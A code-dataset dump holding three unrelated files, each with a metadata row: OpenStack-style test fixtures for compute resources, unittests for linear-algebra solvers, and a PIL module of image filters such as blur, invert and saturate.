console = {u'console': {u'url': u'http://example.com:6080/vnc_auto.html',
u'type': u'novnc'}}
TEST.servers.vnc_console_data = console
# SPICE Console Data
console = {u'console': {u'url': u'http://example.com:6080/spice_auto.html',
u'type': u'spice'}}
TEST.servers.spice_console_data = console
# Floating IPs
def generate_fip(conf):
return floating_ips.FloatingIP(floating_ips.FloatingIPManager(None),
conf)
fip_1 = {'id': 1,
'fixed_ip': '10.0.0.4',
'instance_id': server_1.id,
'ip': '58.58.58.58',
'pool': 'pool1'}
fip_2 = {'id': 2,
'fixed_ip': None,
'instance_id': None,
'ip': '58.58.58.58',
'pool': 'pool2'}
TEST.api_floating_ips.add(generate_fip(fip_1), generate_fip(fip_2))
TEST.floating_ips.add(NetFloatingIp(generate_fip(fip_1)),
NetFloatingIp(generate_fip(fip_2)))
# Floating IP with UUID id (for Floating IP with Neutron Proxy)
fip_3 = {'id': str(uuid.uuid4()),
'fixed_ip': '10.0.0.4',
'instance_id': server_1.id,
'ip': '58.58.58.58',
'pool': 'pool1'}
fip_4 = {'id': str(uuid.uuid4()),
'fixed_ip': None,
'instance_id': None,
'ip': '58.58.58.58',
'pool': 'pool2'}
TEST.api_floating_ips_uuid.add(generate_fip(fip_3), generate_fip(fip_4))
TEST.floating_ips_uuid.add(NetFloatingIp(generate_fip(fip_3)),
NetFloatingIp(generate_fip(fip_4)))
# Usage
usage_vals = {"tenant_id": TEST.tenant.id,
"instance_name": server_1.name,
"flavor_name": flavor_1.name,
"flavor_vcpus": flavor_1.vcpus,
"flavor_disk": flavor_1.disk,
"flavor_ram": flavor_1.ram}
usage_obj = usage.Usage(usage.UsageManager(None),
json.loads(USAGE_DATA % usage_vals))
TEST.usages.add(usage_obj)
usage_2_vals = {"tenant_id": tenant3.id,
"instance_name": server_3.name,
"flavor_name": flavor_1.name,
"flavor_vcpus": flavor_1.vcpus,
"flavor_disk": flavor_1.disk,
"flavor_ram": flavor_1.ram}
usage_obj_2 = usage.Usage(usage.UsageManager(None),
json.loads(USAGE_DATA % usage_2_vals))
TEST.usages.add(usage_obj_2)
volume_snapshot = vol_snaps.Snapshot(vol_snaps.SnapshotManager(None),
{'id': '40f3fabf-3613-4f5e-90e5-6c9a08333fc3',
'display_name': 'test snapshot',
'display_description': 'vol snap!',
'size': 40,
'status': 'available',
'volume_id': '41023e92-8008-4c8b-8059-7f2293ff3775'})
TEST.volume_snapshots.add(volume_snapshot)
cert_data = {'private_key': 'private',
'data': 'certificate_data'}
certificate = certs.Certificate(certs.CertificateManager(None), cert_data)
TEST.certs.add(certificate)
# Availability Zones
TEST.availability_zones.add(
availability_zones.AvailabilityZone(
availability_zones.AvailabilityZoneManager(None),
{'zoneName': 'nova', 'zoneState': {'available': True}}
)
)
# hypervisors
hypervisor_1 = hypervisors.Hypervisor(hypervisors.HypervisorManager(None),
{
"service": {"host": "devstack001", "id": 3},
"vcpus_used": 1,
"hypervisor_type": "QEMU",
"local_gb_used": 20,
"hypervisor_hostname": "devstack001",
"memory_mb_used": 1500,
"memory_mb": 2000,
"current_workload": 0,
"vcpus": 1,
"cpu_info": '{"vendor": "Intel", "model": "core2duo",'
'"arch": "x86_64", "features": ["lahf_lm"'
', "rdtscp"], "topology": {"cores": 1, "t'
'hreads": 1, "sockets": 1}}',
"running_vms": 1,
"free_disk_gb": 9,
"hypervisor_version": 1002000,
"disk_available_least": 6,
"local_gb": 29,
"free_ram_mb": 500,
"id": 1
}
)
TEST.hypervisors.add(hypervisor_1)
# Services
service_1 = services.Service(services.ServiceManager(None),
{
"status": "enabled",
"binary": "nova-conductor",
"zone": "internal",
"state": "up",
"updated_at": "2013-07-08T05:21:00.000000",
"host": "devstack001",
"disabled_reason": None
}
)
service_2 = services.Service(services.ServiceManager(None),
{
"status": "enabled",
"binary": "nova-compute",
"zone": "nova",
"state": "up",
"updated_at": "2013-07-08T05:20:51.000000",
"host": "devstack001",
"disabled_reason": None
}
)
TEST.services.add(service_1)
TEST.services.add(service_2)
# Aggregates
aggregate_1 = aggregates.Aggregate(aggregates.AggregateManager(None),
{
"name": "foo",
"availability_zone": None,
"deleted": 0,
"created_at": "2013-07-04T13:34:38.000000",
"updated_at": None,
"hosts": ["foo", "bar"],
"deleted_at": None,
"id": 1,
"metadata": {
"foo": "testing",
"bar": "testing"
}
}
)
aggregate_2 = aggregates.Aggregate(aggregates.AggregateManager(None),
{
"name": "bar",
"availability_zone": "testing",
"deleted": 0,
"created_at": "2013-07-04T13:34:38.000000",
"updated_at": None,
"hosts": ["foo", "bar"],
"deleted_at": None,
"id": 2,
"metadata": {
"foo": "testing",
"bar": "testing"
}
}
)
TEST.aggregates.add(aggregate_1)
TEST.aggregates.add(aggregate_2)
| apache-2.0 | 3,151,234,665,979,034,000 | 37.476844 | 79 | 0.471113 | false |
kewitz/algebralinear | teste.py | 1 | 2593 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2014 Leonardo Kewitz
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
__version__ = "0.1.00"
__author__ = "kewitz"
__license__ = "MIT"
from numpy import matrix, array, testing
import unittest
import matrixlib as ml
def getAB():
A = matrix([[10., -1., 2., 0.],
[-1., 11., -1., 3.],
[2., -1., 10., -1.],
[0.0, 3., -1., 8.]])
b = array([6., 25., -11., 15.])
return A, b
class LUTest(unittest.TestCase):
def setUp(self):
self.A, self.b = getAB()
def testLUeA(self):
L, U = ml.LUCroutDecompose(self.A)
A2 = L.dot(U)
testing.assert_almost_equal(self.A, A2)
def testSolver(self):
LU = ml.LUCroutInplaceDecompose(self.A)
x = ml.LUSolve(LU, self.b)
testing.assert_almost_equal(x, [1., 2., -1., 1.])
class GaussJordanTest(unittest.TestCase):
def setUp(self):
self.A, self.b = getAB()
def test(self):
x = ml.GaussJordan(self.A, self.b)
testing.assert_almost_equal(x, [1., 2., -1., 1.])
class JacobiTest(unittest.TestCase):
def setUp(self):
self.A, self.b = getAB()
def test(self):
x = ml.Jacobi(self.A, self.b, 20)
testing.assert_almost_equal(x, [1., 2., -1., 1.])
class GaussSeidelTest(unittest.TestCase):
def setUp(self):
self.A, self.b = getAB()
def test(self):
x = ml.GaussSeidel(self.A, self.b, 10)
testing.assert_almost_equal(x, [1., 2., -1., 1.])
if __name__ == "__main__":
unittest.main()
| mit | 1,599,712,270,203,300,400 | 29.151163 | 78 | 0.644427 | false |
andela-ggikera/photo-editing-app | editor/photo_effects.py | 1 | 3217 | """Define imports."""
from PIL import ImageFilter, ImageOps, ImageEnhance
def grayscale(image, name, temp_url):
"""Return an image with a contrast of grey."""
image.seek(0)
photo = ImageOps.grayscale(image)
photo.save(temp_url + "GRAYSCALE" + name)
return temp_url + "GRAYSCALE" + name
def smooth(image, name, temp_url):
"""Return a smoothened image."""
image.seek(0)
photo = image.filter(ImageFilter.SMOOTH)
photo.save(temp_url + "SMOOTH" + name)
return temp_url + "SMOOTH" + name
def contour(image, name, temp_url):
"""Return an image with a contour filter."""
image.seek(0)
photo = image.filter(ImageFilter.CONTOUR)
photo.save(temp_url + "CONTOUR" + name)
return temp_url + "CONTOUR" + name
def sharpen(image, name, temp_url):
"""Return a sharpened image."""
image.seek(0)
photo = image.filter(ImageFilter.SHARPEN)
photo.save(temp_url + "SHARPEN" + name)
return temp_url + "SHARPEN" + name
def detail(image, name, temp_url):
"""Return an image with edge enhancement."""
image.seek(0)
photo = image.filter(ImageFilter.EDGE_ENHANCE)
photo.save(temp_url + "DETAIL" + name)
return temp_url + "DETAIL" + name
def flip(image, name, temp_url):
"""Flip an image."""
image.seek(0)
photo = ImageOps.flip(image)
photo.save(temp_url + "FLIP" + name)
return temp_url + "FLIP" + name
def invert(image, name, temp_url):
"""Invert an image."""
image.seek(0)
photo = ImageOps.invert(image)
photo.save(temp_url + "INVERT" + name)
return temp_url + "INVERT" + name
def mirror(image, name, temp_url):
"""Flip the image horizontally."""
image.seek(0)
photo = ImageOps.mirror(image)
photo.save(temp_url + "MIRROR" + name)
return temp_url + "MIRROR" + name
def contrast(image, name, temp_url):
"""Increase the contrast of an image and return the enhanced image."""
image.seek(0)
photo = ImageEnhance.Contrast(image)
photo = photo.enhance(1.5)
photo.save(temp_url + "CONTRAST" + name)
return temp_url + "CONTRAST" + name
def blur(image, name, temp_url):
"""Return a blur image using a gaussian blur filter."""
image.seek(0)
photo = image.filter(
ImageFilter.GaussianBlur(radius=3))
photo.save(temp_url + "BLUR" + name)
return temp_url + "BLUR" + name
def brighten(image, name, temp_url):
"""Return an image with a brightness enhancement factor of 1.5."""
image.seek(0)
photo = ImageEnhance.Brightness(image)
photo = photo.enhance(1.5)
photo.save(temp_url + "BRIGHTEN" + name)
return temp_url + "BRIGHTEN" + name
def darken(image, name, temp_url):
"""Return an image with a brightness enhancement factor of 0.5."""
image.seek(0)
photo = ImageEnhance.Brightness(image)
photo = photo.enhance(0.5)
photo.save(temp_url + "SATURATE" + name)
return temp_url + "SATURATE" + name
def saturate(image, name, temp_url):
"""Return an image with a saturation enhancement factor of 2.0 ."""
image.seek(0)
photo = ImageEnhance.Color(image)
photo = photo.enhance(2.0)
photo.save(temp_url + "SATURATE" + name)
return temp_url + "SATURATE" + name
| mit | 837,746,076,482,372,200 | 27.981982 | 74 | 0.646254 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.